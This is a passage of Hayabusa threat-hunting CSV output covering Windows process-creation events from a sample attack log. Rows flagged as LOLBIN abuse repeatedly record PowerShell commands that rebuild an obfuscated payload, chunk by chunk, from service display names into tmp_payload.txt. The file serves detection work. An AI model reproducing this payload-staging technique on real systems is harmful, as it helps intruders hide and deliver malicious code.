payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:15.863 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:17.308 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:17.324 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:17.324 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:18.775 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:18.790 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:18.790 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:20.263 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:20.263 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:20.263 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:21.707 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:21.722 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:21.722 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:23.164 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:23.164 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:23.164 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:24.619 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:24.619 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:24.619 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:26.075 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:26.075 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:26.075 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:27.559 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:27.575 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:27.575 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:29.014 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:29.014 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:29.014 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:30.465 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:30.465 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:30.465 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:31.906 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:31.922 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:31.922 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:33.398 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:33.398 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:33.398 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:34.891 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:34.891 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:34.891 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:36.365 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:36.365 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:36.365 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:37.818 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:37.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:37.834 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:39.275 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:39.275 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:39.275 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:40.758 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:40.758 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:40.758 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:42.211 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:42.227 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
